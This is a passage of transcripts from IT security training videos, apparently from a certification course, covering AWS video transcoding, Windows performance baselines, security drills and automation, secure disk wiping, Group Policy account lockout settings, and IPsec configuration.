So I've done these things. I'm going to go ahead and click Create Pipeline. Then I'm going to click Create New
Job. And I'll put this in pipeline2.
[Video description begins] A "Create a New Transcoding Job" page that opens includes a "Pipeline" drop-
down list, an "Output Key Prefix" field, an "Input Details (1 of 1)" section, and an "Output Details (1 of 1)"
section. The "Input Details (1 of 1)" section includes an "Input Key" field. The "Output Details (1 of 1)"
section contains a "Preset" drop-down list, an "Output Key" field, and the following headings: Encryption
Parameters and Available Settings. He selects the "pipeline2" option from the "Pipeline" drop-down
list. [Video description ends]
Then I have to specify the output key prefix. This just serves as a prefix that the transcoder service will add at
the beginning of names of files that are rendered. But I don't want to do that. So for Input Key, I'm going to go
under Vids and choose Demo_Video. [Video description begins] He selects the Vids/Demo_Video.wmv option
from the "Input Key" field. [Video description ends]
And as I scroll down, there's just a few other options here. The preset here, it's currently a WMV. How about
we choose a preset for iPhone 4S?
[Video description begins] In the "Output Details" section, when he selects the System preset iPhone4S option
from the "Preset" drop-down list, a "Create Thumbnails" heading and an "Output Rotation (Clockwise)" drop-
down list display below the "Output Key" field. Also, a "Watermarks" section displays below the "Output
Details (1 of 1)" section. The "Create Thumbnails" heading has two options: No and Yes. Currently, No is
selected. The "Watermarks" section contains a Preset Watermark Id drop-down list. [Video description ends]
And the output key is going to be the name of the rendered file. So how about we simply call it Demo_Video.
And we see here there's a little hint. The recommendation is to use the .mp4 extension, which we will certainly
do in this case. And as we go further down, I'm going to choose my logo file. And let's say that we want this
could be in any position within our video media clip.
I'm going to choose here, TopLeft. And I'm going to specify our logo file to do that. And maybe while we're at
it, I'll tell it that, yes, I do want to create thumbnails. [Video description begins] When he selects the "TopLeft"
option from the Preset Watermark Id drop-down list, the options that display below the list include an "Input
Key for Preset Watermark Id TopLeft" field. He selects the following lone option in the field: logo.jpg. [Video
description ends]
And maybe for the file name pattern prefix, maybe what we'll do is use Demo_Video. We get a sense down
below of what the thumbnail file nomenclature will look like.
[Video description begins] In the "Output Details" section, when he selects the "Yes" option that displays
against the "Create Thumbnails" heading, the options that display below the heading include a "Thumbnail
Filename Pattern" field and a "Thumbnail Filename Preview" heading. And when he types Demo_Video in the
"Thumbnail Filename Pattern" field, the following text displays against the "Thumbnail Filename Preview"
heading: Demo_Video-00001.png. In the "Output Details" section, when he selects the "Yes" option that
displays against the "Create Thumbnails" heading, the options that display below the heading include a
"Thumbnail Filename Pattern" field and a "Thumbnail Filename Preview" heading. And when he types
Demo_Video in the "Thumbnail Filename Pattern" field, the following text displays against the "Thumbnail
Filename Preview" heading: Demo_Video-00001.png. [Video description ends]
So now that I've got this all defined in the job, I'm going to click Create New Job. And I'm just going to go
back to Jobs. [Video description begins] The application returns to the page that has the following categories
in the navigation pane: Pipelines, Jobs, and Presets. And with the Jobs category being selected, the
corresponding view includes a "Search" button and a "Pipeline ID" drop-down list. [Video description ends]
And I'm going to specify pipeline2. And I'm going to choose Search. [Video description begins] He selects the
"pipeline2" option from the "Pipeline ID" drop-down list. The "Jobs" category now includes a refresh button
and an associated table with the following columns: ID, First Input Key, Status, etc. The
Vids/Demo_Video.wmv input key appears in the table. [Video description ends]
So we can see our job has been submitted essentially into the pipeline or queue. And currently it has a status of
Progressing. So I can wait here and keep refreshing until such time that the job status is Completed. Once it's
finished, if we go to S3, we'll see that we've got our source video, Demo_Video.wmv. But we also have our
output video. It's an MP4 file. [Video description begins] The following are among the links now listed in the
table in the "Vids" page: Demo_Video-00002.png, Demo_Video.wmv, and Demo_Video.mp4. [Video
description ends]
And we've got our thumbnails. If I click on the first thumbnail file and open it, we can see it's got, looks like
some video, and it looks like a tiny little logo embedded on it. That's our watermark. So let's go back to Vids.
And why don't we go down and just check out the actual rendered video itself, the MP4. So I'm going to click
on it to open it up. And then I'll click the Open button. We can see the video has started and we've got our
embedded logo or watermark.
[Video description begins] Topic title: Baselines. Your host for this session is Dan Lachance. [Video
description ends]
When it comes to IT security, establishing a baseline of normalcy is crucial so that we have an easy way to
identify what is abnormal. And that also includes at the performance level. In this example, we're going to use
Windows Server 2019, specifically within the Performance Monitor, to create a data collector set. Data
collector set can be scheduled to gather specific performance metrics over time, which is great in establishing a
baseline.
So to get started here in Windows Server 2019, from the Start menu, I'm going to search for perf, as in P-E-R-
F, and then I'm going to choose Performance Monitor. We build data collector sets, or DCSs, here within the
Performance Monitor tool. We can see Data Collector Sets listed over here on the left.
[Video description begins] The "Performance Monitor" application that opens includes a toolbar, a
navigation pane, and a content pane. The navigation pane has a "Performance" category, which includes the
following nodes: Data Collector Sets and Reports. And the presenter expands the "Data Collector Sets" node
to reveal, among others, the following nodes: User Defined and System. [Video description ends]
There are some system-defined data collector sets based on what might be configured on this machine
already. [Video description begins] He expands the "System" node to reveal three data collector sets. [Video
description ends]
But we're interested in user-defined data collector sets. So I'm going to right-click on User Defined, choose
New, Data Collector Set. I'm going to call it Establish Performance Baseline. [Video description begins] The
content pane now includes a "Create new Data Collector Set" section. The section display the following
message: How would you like to create this new data collector set?. Next. a "Name" field and the following
options display: Create from a template (Recommended) and Create manually (Advanced). Currently, the
"Create from a template (Recommended)" option is selected. [Video description ends]
And I'm going to create it manually. So I'll select that option and I'll click Next. Now what I want to do is I
want to use performance counter. [Video description begins] The section now displays the message: What type
of data do you want to include?. Next, the following options display: Create data logs and Performance
Counter Alert. The "Create data logs" option, which is selected, includes a "Performance counter"
checkbox. [Video description ends]
I want to gather some performance metrics on the machine to determine what kind of performance stats are
considered normal for this particular host. And so I'm going to go ahead and click Next. [Video description
begins] He selects the "Performance counter" checkbox. The section now displays the following question:
Which performance counters would you like to log?. Next, a "Performance counters" subsection displays. It
has the following associated buttons: Add... and Remove. And below it is a spin box labeled: Sample interval:
(given as 15). The spin box has an associated "Units" drop-down list, which is set to Seconds. [Video
description ends]
So the next screen asks, which counters are you interested in or which metrics? So I'm going to click Add. So I
can select from the local computer.
[Video description begins] A dialog box appears. It includes two vertical sections: Available counters and
Added counters. The "Available counters" section includes a "Select counters from computer:" drop-down list,
which has an associated "Browse" button. Next, a list comprising several nodes displays. And below that is an
"Instances of selected object:" subsection. The section also includes an "Add" button. The "Added counters"
section has a table with the following columns: Counter, Parent, Instances, and Computer. [Video description
ends]
Of course, I could reach out over the network as well. But I'm interested, let's say, in looking at the Processor
such as the % Processor Time – how busy the processor is. [Video description begins] He expands the
"Processor" node in the list in the "Available counters" section to reveal several objects These include %
Processor Time, which he selects. And the "Instances of selected object:" subsection displays three options:
Total, <All instances>, and 0. Total is selected. [Video description ends]
Now the default instance of that selected objected is the Total in the case of a multiprocessor system. And
that's what I'm interested in. So I'm going to go ahead and add that. And I can also scroll through the list and
select other items I might be interested in looking at. [Video description begins] The "% Processor Time"
object with Instances listed as _Total appears in the table in the "Added counters" section. [Video description
ends]
So for example, I'm going to go to the Ms because I'm interested in looking at memory stats on this particular
host; for example, Committed Bytes In Use. Or maybe I could look at Available Bytes or kilobytes or
megabytes as we can see listed here. So we could select those items and just add them to the list on the
right. [Video description begins] He expands the "Memory" node to reveal, among others, the following
objects: % Committed Bytes In Use, Available Bytes, Available KBytes, and Available MBytes. And when he
selects the Available MBytes object, it appears in the table in the "Added Counters" section. [Video description
ends]
So we will continue selecting the performance metrics of interest that we want to use to establish a baseline.
I'm going to go one more, and what that's going to be is the physical disk, some of the physical disk counter.
So I'm going to go to the Ps. And I'm going to go all the way down to PhysicalDisk, going to expand that. And
I'm interested in what's called the average disk queue length. And I want the Total instance of that. So I'll add
that.
Basically, the queue length for the disk subsystem identifies disk I/O requests that couldn't be serviced because
the disk I/O subsystem is already busy and so they get queued up. So a large amount of items in a disk queue
might be considered bad. I say might, we don't know what's normal. It's normal if you have a busy disk read-
and-write environment that you would have some items queued up. Question is how many items and for how
long. So you'd have to look at that under normal load conditions when performance is acceptable. So having
done this, I'm going to click OK.
[Video description begins] He returns to the "Performance Monitor" application. [Video description ends] I'm
going to have the sample interval, let's say, every five minutes. I'll click Next. [Video description begins] After
typing 5 in the "Sample interval:" spin box, he selects the "Minutes" option from the "Units:" drop-down list.
The "Create new Data Collector Set." section now displays the message: Where would you like the data to be
saved?. And below that is a "Root directory:" field with an associated "Browse..." button. A location displays
in the field. [Video description ends]
That's the default location to save the data. I'm going to accept that. I'll click Next. [Video description
begins] The section now displays the message: Create the data collector set?. The following options, among
others, display below the message: Open properties for this data collector set, Start this data collector set
now, and Save and close. The "Save and close" option is selected. [Video description ends]
And I'm going to open the properties for the data collector set and click Finish because we haven't set a
schedule. So I'm going to click Schedule. I'll click the Add button.
[Video description begins] When he clicks the "Finish" button, an "Establish Performance Baseline
Properties" dialog box appears. It includes the following tabs: General, Directory, Schedule, etc.. General is
selected. When he selects the "Schedule" tab, the corresponding view includes an empty "Schedules:" table
with the following columns: Start, Days, Beginning, and Expires. The table has an associated "Add" button.
And when he clicks it, a "Folder Action" dialog box appears. It includes two sections: Active range and
Launch. The "Active range" section has a "Beginning date:" field and an "Expiration date:" field, each of
which features a calendar icon. The "Beginning date:" field is set to a specific date. The "Expiration date:"
field, which is unavailable, has an associated checkbox, which is clear. The "Launch" section includes a
checkbox associated with each day of the week. All these checkboxes are selected. [Video description ends]
I want it to start today. And I can set an expiration date; let's say, maybe a week later. [Video description
begins] He selects the checkbox associated with the "Expiration date:" field. [Video description ends] So we're
going to capture these performance metrics every five minutes over a one-week period of normal usage of this
host, to establish a normal baseline. And I'm going to click OK and OK. [Video description begins] A
"Performance Monitor" prompt, which includes an "OK" button, appears. [Video description ends]
And I've just popped in the administrative credential. [Video description begins] The application returns to the
"Performance Monitor" view. [Video description ends] So now under User Defined, we now see Establish
Performance Baseline. [Video description begins] He selects the "Establish Performance Baseline" data
collector set. [Video description ends]
Now we could wait for the schedule to kick in. But at any point in time, you can also click the start button up
at the top, which I will do. And if we drill down in the left-hand navigator, under Reports, User Defined, and
there's Establish Performance Baseline. [Video description begins] When he clicks the "Start the Data
Collector Set." button in the toolbar, an "Establish Performance Baseline: Report Status" section opens in the
content pane. It displays a progress bar. [Video description ends]
And if we actually select the hostname – that's the Windows computer name – we can see that the status of the
report, instead of seeing the result, we see that it's in the midst of collecting data. [Video description
begins] The content pane now includes a line graph, whose horizontal axis is set to a scale of 5 minutes. The
graph displays three lines, representing the % Processor Time counter, the Avg. Disk Queue Length counter,
and, the Available MBytes counter, respectively. Below the line graph, the following fields display: Last,
Average, Minimum, Maximum, and Duration. Next, a table with the following columns displays: Color, Scale,
Counter, etc. The three counters are listed in the table. [Video description ends]
So once the DCS has completed gathering its stats, for example, over a one-week period of normal usage, we
can look at a standard baseline of performance on this particular host. [Video description begins] He points to
the host name which is selected and which displays in the "Reports" node in the navigation pane. [Video
description ends]
So looking at the performance baseline I've selected and we can see it's charted each item, which is shown
down at the bottom in the legend. So for example, the blue item is the amount of memory in the unit of
megabytes. The green line listed up here – I can select that down below and press Ctrl+H to highlight it – is the
average disk queue length. And of course, the red item here is the percent processor time. So we have a sense
of what is normal over a period of time of normal usage. And that is the purpose of this.
Now when you select an item, in this case, processor time, you can see the last measurement taken over CPU
utilization, the average, which is only 6.3% or so. You can see the minimum and the maximum values. [Video
description begins] He points to the measurements that populate in each of the fields that display below the
graph. [Video description ends]
So we're interested in looking at the average. If we have too much of a deviation beyond the average, then
there might be something suspicious going on. Or it could be just a peak in demand for the application running
on that server, if that's how it's configured. So normally, when we configure our intrusion detection or security
incident detection tools, we'll configure rules that might look at what the baseline is.
And any deviations from the baseline for your period of time might be then configured to trigger an alarm of
some kind. [Video description begins] He points to the measurement that displays in the "Average"
field. [Video description ends]
In this video, you will discuss various types of IT security training exercises.
Objectives
[Video description begins] Topic title: Security Training. Your host for this session is Dan Lachance. [Video
description ends]
Security training is one of those things that really needs to be applied at all levels of the organizational
hierarchy – all the way from the day-to-day employees that perform day-to-day tasks all the way up to the top
at the executive level. The team that crafts organizational security policies needs to begin by defining business
objective – what's the goal that the organization has overall and what objectives would get to those goals?
And what are the applicable regulations? Because often, industry regulations will have a big impact on
organizational security policies, such as a requirement to retain data for a period of time or a requirement to
encrypt sensitive data. And so the creation and updating of organizational security policies is an ongoing task.
This changes because threats change and, of course, industry regulations change over time.
Now part of security training is going to be making sure that the applicable teams conduct periodic security
drills or tests. That might even come in the form of the organization hiring a penetration testing team. Security
drills come in many forms. There are tabletop exercises. All that this means is essentially it's an informal
meeting where people show up, for example, in a boardroom or virtually through video conferencing, to
discuss issues related to a potential security incident if it were to occur.
Now notes need to be taken because much can be learned from this in terms of where there are gaps. People
don't know what their roles are, for example, or don't know how to escalate an incident to another party. There
are red teams. Red teams are the offensive technicians that perform attacks – think of hiring penetration testers.
The blue team would be the defensive technicians that maintain the IT systems and security defenses. Think of
that as the internal IT security team. The white team is the team that oversees all of the security drills and tests.
Because security is so prevalent in the media and it's constantly changing, it's important to keep updated on the
newest developments. And so proactive security education is absolutely crucial. But in order for that to work,
there needs to be management buy-in. Management in the organization needs to support security education
because it costs money and it takes time. So for example, having paid work time for security education. So
making sure that the appropriate employees at different levels in the organization are getting trained and still
getting paid. It's worth it in the end.
For IT security technicians, it's important to subscribe to the appropriate security mail lists. For example, if
your environment uses Juniper Systems' and Cisco Systems' network infrastructure devices, you should be
subscribing to any security mailing lists related to known vulnerabilities with those items.
It's also important to have a sandbox or testing environment. And this is really easy to do in the cloud and very
inexpensive because you only pay for it when you're using it. So you can shut down virtual machines and
virtual networks and delete them when you don't need them and thus not pay for them. This is a great way to
spin up a testing environment for simulated security scenarios.
Upon completion of this video, you will be able to recall how automation can simplify and expedite security
tasks.
Objectives
The timely response to security incidents to minimize the negative impact when they occur is through using
centralized monitoring tools and automation. So when we identify security automation candidates, we have to
think about those IT security technician types of tasks that can be automated and are repeatable. So we need to
look at any patterns that might have occurred in the past, in other words, tasks executed by IT security
personnel, that can be automated.
Automation candidates could include those related to the detection of phishing scams. This could be a
technical solution that uses heuristics, as opposed to standard malware signatures, to look for suspicious
behavior or to look for abnormal e-mail domains within mail messages. Then there is malware remediation –
what is normally done to deal with malware outbreaks. It could be isolation of a device to remove it from the
network. But at the same time, it might also be to reboot the machine in another mode to ensure the proper
removal of the malware.
And you have to ask yourself, how much of that can we actually automate? And it doesn't have to be
completely automatable from beginning to end. Even if a portion of it can be automated, there can still be a
benefit realized because we are containing the incident more quickly. There's historical correlation. Often
centralized security monitoring tools such as SIEM tools have the ability to be configured to correlate events.
This means looking at an event and how it might be related to something that happened previously.
For example, if we had a new Linux host show up on the network two days ago and today we have excessive
network spikes stemming from that host, correlation could state that that's suspicious. All of a sudden, we have
this host on the network now. There's a lot of traffic coming from that host. That might not be considered
normal. Now I say "might" because there is a lot of customized configuration required to tweak this for a
specific environment. Because what's abnormal in one environment might be perfectly normal in another.
Another automation candidate would be how alerts are sent out, whether it's e-mail notifications, SMS text
messages, even automating the response with an intrusion prevention system, to perhaps stop an attack in its
tracks. An example of that might be using black holing. So if we detect that we have a distributed denial-of-
service attack that might be beginning, we might route that traffic that we think is suspicious and is part of the
DDoS attack, routed to nothing. In other words, so it doesn't get to an intended network or host and therefore
cannot flood it. So allowing an escalation might be potential security automation candidates.
It's important when we talk about security automation that we distinguish the difference between automation
and orchestration because they are not the same thing. So first of all, automation means that we are removing
human input and we can use solutions, especially in the cloud, like machine learning. Machine learning can
use algorithms and, based on ingested data, can start to learn how to make decisions. Of course, that can be
tweaked and controlled by IT security personnel.
There are a lot of CLI tools that can be used to start to automate certain actions related to security, like
malware remediation or dealing with things like the application of updates. So therefore, scripts can be written
using PowerShell cmdlets. Or it could be done in a Unix or Linux environment by writing a BASH shell script.
And we can also automate some tasks using templates. Templates essentially are blueprints or sets of
instructions on how to do something, such as how to deal with some kind of a security incident that has been
raised.
Now orchestration is a little bit different because it's designed to combine multiple automation tasks that are
related into a workflow. Now some or all of it can be automated. It might require some user input in some
cases. And when we look at these two things together, security automation and orchestration, what comes to
mind is Security Content Automation Protocol, otherwise called SCAP. The purpose of SCAP is to use
standards, security standards, to automate vulnerability management. Now that's a general statement. Exactly
how that is done will depend on the solution selected.
An example of this might be if you're using Microsoft System Center Configuration Manager, or SCCM, you
might configure security baselines with autoremediation. So for example, if a vulnerable registry entry is
detected on hosts, the autoremediation would change the value of that registry setting.
The other thing to think about is that with automation and orchestration where is the data coming from? So the
data ingestion could stem from a multitude of sources. It could be coming from logs on endpoint perimeter
devices like firewall router devices. We could have server logs, application logs, all being fed to a central
location. And that's important for this to work properly. The notion of playbooks comes in. A playbook is a
collection of instructions that should be undertaken when a specific incident occurs, and it can be either
partially or completely automated. So human intervention might still play a part. It depends on the nature of
the playbook.
The other thing to think about is with security automation and orchestration, the end result is reduced incident
response time, reduced time it would take to contain a problem like malware, and also even some automated
remediation, thus freeing up security analysts to focus their time on other items. Should also think about
security API integration. At the software development level, developers can call upon trusted libraries, they
can call functions, so that they can adhere to secure coding practices.
[Video description begins] Slide title: Security Triage Automation. [Video description ends] Security triage is
all about initial incident response assessment that determines if we've got a false positive, meaning we've got
an alert that was raised but there is no security incident, or if there really is something happening and it
requires further action. So the first responders to an incident deal with security triage to perform a basic
assessment.
Now the primary benefit of security triage automation is to reduce alert fatigue. IT security technicians are
probably already overworked and receiving numerous alerts, which many of which could be false positives –
alerting of a security incident when there really is none. There needs to be a way to weed out the false positives
and to automate this.
In the end, it helps improve response time for the real incidents that do occur and it allows to prioritize
incidents. Again, that can be automated as well based on some configuration criteria. And there can also be the
automated task workflow assignment. So when a security incident is detected as being valid, there can be an
automated system that starts sending out notifications and alerts so that tasks can begin in dealing with the
security incident.
In this video, learn how to delete a disk partition using a tool that wipes the disk multiple times.
Objectives
[Video description begins] Topic title: Secure Disposal. Your host for this session is Dan Lachance. [Video
description ends]
Secure disposal of storage media means following the appropriate practices to ensure that data is permanently
deleted and data artifacts cannot be recovered. This is also true in the cloud. It's one of the considerations when
looking at cloud service providers is, what practices are put in place to safely remove data when it's no longer
needed?
So here on Windows Server 2019, I'm going to install a tool called HDScrub34. [Video description begins] An
HDScrub34 application is available in the "This PC" category of a HardDiskScrubber_34 window. [Video
description ends] There are plenty of tools out there that will do this. [Video description begins] When the
presenter double-clicks the application, a "Setup - Hard Disk Scrubber" wizard appears. It includes a "Next"
button. [Video description ends]
I'm essentially going to accept the defaults for this installation. And after which, we will run the tool to wipe
out a disk partition. So I'm going to launch the Hard Disk Scrubber tool. [Video description begins] He points
to a "Launch Hard Disk Scrubber" checkbox, which is selected. [Video description ends]
I'll click Finish. [Video description begins] A Disk Scrubber v3.4 dialog box appears. It includes two sections:
Hard Disk Free Space Scrubbing and Scrub (Overwrite) Type. The "Hard Disk Free Space Scrubbing" section
includes a "Drive to Scrub:" drop-down list, which is set to C: (Local Disk); a "Priority:" drop-down list,
which is set to Normal; and an associated "Scrub Drive" button. The "Scrub (Overwrite) Type" section
includes the option: Ultra (9-Stage, DoD recommended spec w/Vfy)" option. [Video description ends]
What I want to do is scrub out drive D on this host. Naturally, you want to be very careful with this tool to
make sure that there's nothing on that drive you don't already have a copy of, if you need a copy of it. [Video
description begins] He selects the "D: (New Volume)" option from the "Drive to Scrub:" drop-down
list. [Video description ends]
So if we're going to decommission a storage area, in this case drive D on this host, then we could scrub it. Now
that means multiple pass-writes. I could select drive D. And down below, I could choose, for example, the
Ultra overwrite or scrubbing type. It's a 9-stage, Department of Defense, in the United States, recommended
specifications, with verify. So we're talking about multiple passes of overwriting everything on the disk to
ensure that nothing can be recovered.
So once we've got that done, we can specify that we want to scrub the drive. So I'm going to go ahead and
click Scrub Drive. And we can see at this point, it's begun the process. So it's starting to do pass number 1 of 9
where all zeros are being written through every storage area on the disk. [Video description begins] He points
to a progress bar that displays at the top of the Disk Scrubber v3.4 dialog box. [Video description ends] This
means that if this storage device fell into unauthorized hands, the chances of somebody being able to recover
the contents of it are slim to none.
[Video description begins] Topic title: Enable Password Lockout Settings. Your host for this session is Dan
Lachance. [Video description ends]
If your organization uses Microsoft Windows, then you might be interested in using Group Policy to configure
security settings such as those that might be related to enabling password lockout settings. Here on my
Windows Server 2019 server, which is also an Active Directory domain controller, I'm going to go into the
Start menu, and down under Windows Administrative Tools, I'm going to scroll down until I see in the Gs the
Group Policy Management tool. Group Policy can be configured centrally in Active Directory.
[Video description begins] The presenter selects the "Group Policy Management" category, and the
corresponding console opens. It includes a toolbar and contains a single category, Group Policy
Management, in the navigation pane. The category has a single node, Forest Domain1.Local. [Video
description ends]
And any computers that are joined to the Active Directory domain could be affected by it. I say "could" – it
depends how you configure the scope of the Group Policy Object. So here on the left, I'm going to expand the
name of my forest and domains. There's my domain. It's called Domain1.Local. I'll expand that. And under
that, I see the Default Domain Policy. That's a GPO. That is a Group Policy Object that contains potentially
thousands of settings that would apply to every user and computer in the domain or a subset, again depending
on how we configure the scope.
[Video description begins] The expanded "Forest Domain 1.Local" node includes a "Domains" node. He
expands the "Domains" node to reveal a "Domain1.Local" node. Next, he expands the "Domain1.Local" node
to reveal a "Default Domain Policy" file and a few nodes. [Video description ends]
So by default, any settings I put in the Default Domain Policy will flow down to all users and computers joined
to the domain unless otherwise specified. So I'm going to go ahead and right-click on the Default Domain
Policy and choose Edit. [Video description begins] A "Group Policy Management Editor" application opens.
It has a "Default Domain Policy" category in the navigation pane. The category contains two nodes:
Computer Configuration and User Configuration. The "Computer Configuration" node, which is expanded,
contains two nodes: Policies and Preferences. [Video description ends]
Now there are thousands of settings that can be configured in Group Policy. So from a security perspective,
this is a good thing if you have a lot of computers joined to the domain. It's a centralized way to configure
security settings that will impact many machines at once. So we're going to take a look at how to configure
password lockout settings.
So under Computer Configuration on the left, I'm going to go down under Policies, I'm going to go down
under Windows Settings. Once that expands, I'm going to go down under Security Settings. Then I'll go down
under Account Policies. And then we have a number of items that we can configure, one of which is the
Account Lockout Policy.
[Video description begins] He double-clicks the "Account Lockout Policy" node and a table with the following
columns displays: Policy and Policy Setting. The following policies appear in the table: Account lockout
duration with Policy Setting listed as Not Defined, Account lockout threshold with Policy Setting listed as 0
invalid logon attempts, and Reset account lockout counter after with Policy Setting listed as Not
Defined. [Video description ends]
Now here, we can specify the account lockout threshold. So if I were to put this to a value of 3, it means after
three invalid logon attempts, that user account will be locked out. So we get to specify some other settings.
When I click OK, it says we're going to turn on some other settings here. And we can configure them other
than their defaults.
[Video description begins] He double-clicks the "Account lockout threshold" policy, and an "Account lockout
threshold Properties" dialog box appears. It contains two tabs: Security Policy Setting and Explain. The
"Security Policy Setting" tab, which is selected, includes the following spin box: Account will not lock out.
(given as 0 invalid logon attempts). After setting the spin box to 3, when he clicks the "OK" button, a
"Suggested Value Changes" prompt appears. He clicks the "OK" button, closes the "Account lockout threshold
Properties" dialog box, and returns to the "Group Policy Management Editor" application. In the table that
displays in the "Account Lockout Policy" node, the "Account lockout duration" policy now appears with Policy
Setting listed as 30 minutes, the "Account lockout threshold" policy appears with Policy Setting listed as 3
invalid logon attempts, and the "Reset account lockout counter after" policy appears with Policy Setting listed
as 30 minutes. [Video description ends]
So how long should the account be locked after three invalid login attempts? The default value is 30 minutes,
but we could change that. [Video description begins] He double-clicks the '"Account lockout duration" policy
to open the corresponding properties dialog box. It includes a spin box: "Account is locked out for:" (given as
30 minutes). After pointing to the spin box, he closes the dialog box. [Video description ends]
Also, how long until we reset the account locked counter? So the fact that it retains information about the
account having been locked. Normally, that's at the same value as the actual lockout interval. So that's 30
minutes. Now what does this solve? [Video description begins] He double-clicks the "Reset account lockout
counter after" policy to open the corresponding properties dialog box. It includes a spin box: Reset account
lockout counter after (given as 30 minutes). After pointing to the spin box, he closes the dialog box. [Video
description ends]
Well, what it will solve is brute force password attempts where a malicious user might use an automated tool
to try numerous username and password combinations against the account until one works and they get in. So
by doing this, after the first three attempts, the account is locked out for 30 minutes. Now that's good from a
perspective of mitigating brute force attacks.
But what about the poor user who can't log in anymore? Well, they would have to contact the help desk in
some way to get the account unlocked after they prove their identity in some way, in accordance with
organizational security policies. Now bear in mind, that's all we need to do for this to apply to every computer
in the domain by default – even computers in organizational units, or OUs, under the domain. [Video
description begins] After closing the "Group Policy Management Editor" application, he returns to the "Group
Policy Management" console and points to the nodes in the "Domain1.Local" node. [Video description ends]
And bear in mind that it will take some time before Group Policy refreshes on computers. So for computers
that are joined to the domain and online right now, it could take up to an hour, an hour and a half, before
Group Policy refreshes and this change is put into effect. Now the only concern here is, wait a minute, what
about administrative accounts? If all computers in the domain will put this into effect, then that might be a
problem.
Well, what we could do is exclude administrative accounts. So for example, let's go to Windows
Administrative Tools in the Start menu. Let's open up Active Directory Users and Computers. So let's say that
we've got administrators that use specific computers joined to the domain.
[Video description begins] The "Active Directory Users and Computers" tool that opens includes a toolbar
and has the following nodes in the navigation pane: Saved Queries and Domain1.Local. The "Domain1.Local"
node, which is expanded, includes two nodes: Computers and Users. And when he selects the "Computers"
node, the corresponding view has a table with the following columns: Name, Type, and Description. A single
computer name appears in the table. [Video description ends]
So what I'm going to do then under my domain is build a new organizational unit called Admins. I'll click
OK. [Video description begins] He selects the "Domain1.Local" node and clicks the "New Object" icon in the
toolbar. A "New Object - Organizational Unit" dialog box appears. It includes a "Name:" field. And when he
types "Admins" in the "Name:" field and clicks the "OK" button, an "Admins" folder displays in the
"Domain1.Local" node. [Video description ends]
Now what I would normally do is move computers to that location. Of course, that means that they might get
different Group Policy settings associated with them. And that's true. [Video description begins] He selects the
"Computers" node and drags the record that displays in the corresponding table to the "Admins" folder. And
when he double-clicks the folder, the corresponding view now contains the record. [Video description ends]
You could also move user accounts to that location if you so choose. So I can move users and computers that
admins use to the Admins OU. Now you don't have to do this, but it's an option. [Video description
begins] When he selects the "Users" node, the corresponding view has a table with the following columns:
Name, Type, and Description. Several users, including "Administrator," are listed in the table. He then drags
the "Administrator" record to the "Admins" folder. And when he selects the folder, the corresponding view
also displays the "Administrator" record. [Video description ends]
Now what purpose does that serve? Well, none unto itself. Let's go back into Group Policy. Because what we
could then do, let's refresh this list here because now we can see the Admins OU. I could right-click on the OU
and I could block inheritance. [Video description begins] After returning to the "Group Policy Management"
console, when he clicks the refresh icon in the toolbar, an "Admins" node also now displays in the
"Domain1.Local" node. He then opens the corresponding context menu and clicks Block Inheritance. [Video
description ends]
So we get that little blue symbol with the white exclamation mark. [Video description begins] He points to the
"Admins" folder. [Video description ends] That means that any GPOs, any group policies from above like the
default domain policy where the settings would normally flow into OUs, because I've blocked inheritance on
that one, they will not.
So therefore, the password account lockout settings will not apply to admins, at least those admins that have
computers within the Admins OU. So there are a few things that we should consider when it comes to enabling
security settings like account lockout and its potential impact on administrative accounts.
[Video description begins] Topic title: IPsec. Your host for this session is Dan Lachance. [Video description
ends]
IPsec stands for IP Security, Internet Protocol Security. It's all about securing network transmissions in a
variety of different ways. But the great thing about IPsec is it's not application specific. What does that mean?
Well, think about securing a website. So instead of HTTP, you want connectivity over HTTPS, where the S
stands for Secured. So you need a PKI certificate to enable TLS on the web server to make that happen. But if
you've got numerous web servers, then basically you have to go through and make that configuration over and
over and over many times.
IPsec isn't application specific. It's protocol specific. So if you wanted to secure all IP traffic, you could have
that happen on a local area network, for example, with a single configuration. Now there are two main IPsec
modes. And really, your configuration determines which of these is used. There's tunnel mode. Tunnel mode
uses packet encapsulation, basically putting one packet inside of another, sending it off. And on the other end,
it gets revealed. So it gets de-encapsulated. So this is often used for VPN tunneling.
However, IPsec isn't only for VPNs. You can also use it in transport mode. Now there's no packet
encapsulation with transport mode. So we aren't placing one packet inside of another one. And you'll find
transport mode with IPsec is normally used when you want confidentiality, when you want to encrypt packet
payload. And that would be for any type of traffic as long as your configuration doesn't specify otherwise.
IPsec supports Authentication Headers, otherwise called AH, as well as Encapsulating Security Payload, ESP.
Authentication Headers can be used with or without ESP. And it's used to determine the authenticity of the
message. Is it authentic? Was it sent from who it says it was sent from? And has it been tampered with or not?
So choose for authentication. Whereas ESP can be used with or without Authentication Headers. But unto
itself, it provides confidentiality or encryption for packet payloads.
As you might guess, for the ultimate in security, you might want to configure AH and ESP to work together.
Now after two devices that are configured to use IPsec communicate with one another and they negotiate the
terms that they will use to transmit – so they'll support IPsec – after that happens, they are said to have
established a security association or an SA, after which, IPsec is used to securely transmit data.
Now if you're in a Windows environment, you can actually configure this within Windows Defender Firewall.
You do it through connection security rules. Now you could do it centrally through the Group Policy if you
want to apply this to numerous domain-joined computers in a Microsoft Active Directory environment.
14. Video: Enable IPsec (it_cscysa20_15_enus_14)
In this video, learn how to enable IPsec connection security rules using Microsoft Group Policy.
Objectives
[Video description begins] Topic title: Enable IPsec. Your host for this session is Dan Lachance. [Video
description ends]
IPsec stands for IP Security. This is a standard that allows for the protection of network traffic, whether it's
authentication or whether it's encryption or perhaps both. In a Windows environment, you can enable IPsec on
an individual machine through connection security rules within Windows Defender Firewall. Or you can do it
centrally through Group Policy.
Let's just examine both options quickly. So here on Windows Server 2019, I'm going to go into the Start menu
and I'm going to type in firewall. That will let me pop up Windows Defender Firewall with Advanced Security.
Now of course, Windows Defender Firewall can be used to define inbound and outbound rules to allow or
deny traffic as it might be.
[Video description begins] The "Windows Defender Firewall with Advanced Security" console has the
following category in the navigation pane: Windows Defender Firewall with Advanced Security. The category
includes the following files: Inbound Rules, Outbound Rules, and Connection Security Rules. It also contains a
"Monitoring" node. [Video description ends]
But it's also got Connection Security Rules. [Video description begins] When the presenter selects the
"Connection Security Rules" file, the corresponding view has an empty table with the following columns:
Name, Enabled, Endpoint 1, etc.. [Video description ends] Here we could right-click and build a connection
security rule to determine how IPsec should behave. [Video description begins] When he right-clicks the
"Connection Security Rules" file and clicks New Rule... from the corresponding context menu, a New
Connection Security Rule Wizard appears. [Video description ends]
Now by doing that on this host, we are only configuring IPsec on this host. However, we can also do it
centrally through Group Policy, which would potentially affect multiple computers joined to the Active
Directory domain. [Video description begins] He closes the wizard and the console. [Video description ends]
